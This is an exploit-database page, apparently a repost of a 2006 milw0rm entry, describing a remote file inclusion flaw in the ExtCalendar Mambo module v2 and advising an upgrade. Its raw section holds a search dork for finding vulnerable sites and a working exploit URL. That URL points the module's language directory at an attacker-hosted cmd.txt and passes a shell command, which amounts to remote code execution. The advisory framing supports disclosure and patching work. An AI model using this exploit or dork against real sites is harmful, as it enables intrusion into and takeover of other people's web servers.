ExtCalendar Mambo Module - exploit.company

vendor:

Mambo Module

by:

OLiBekaS

7,5

CVSS

HIGH

Remote File Include

CWE

Product Name: Mambo Module

Affected Version From: v2

Affected Version To: v2

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

ExtCalendar Mambo Module <= v2 Remote File Include Vulnerabilities

A remote file include vulnerability exists in ExtCalendar Mambo Module <= v2, which allows an attacker to include a remote file containing malicious code. This can be exploited to execute arbitrary PHP code by sending a specially crafted request to the vulnerable script.

Mitigation:

Upgrade to the latest version of ExtCalendar Mambo Module.

Source

Exploit-DB raw data:

--------------------------------------------------------------------------------
Title : ExtCalendar Mambo Module <= v2 Remote File Include Vulnerabilities
###############################################################################

Discovered By OLiBekaS
-----------------------------------------------------------------------------

dork        : "powered by ExtCalendar v2"
Exploit     :  
http://[target]/[path]/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://[attacker]/cmd.txt?&cmd=ls         
               
-----------------------------------------------------------------------------

greatz:
~~~~~
# Special greetz to my master effex and bEdAh`oTaK ( thank man )
# To all members of #papmahackerlink, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster, yugo^cloudy. and other

-------------------------------------------------------------------------------

Contact:
~~~~~~~

Nick: OLiBekaS
E-mail: olibekas[at]gmail[dot]Com
Homepage: http://bekas.6te.net

--------------------------------- [ eof ] ---------------------------------------

# milw0rm.com [2006-07-17]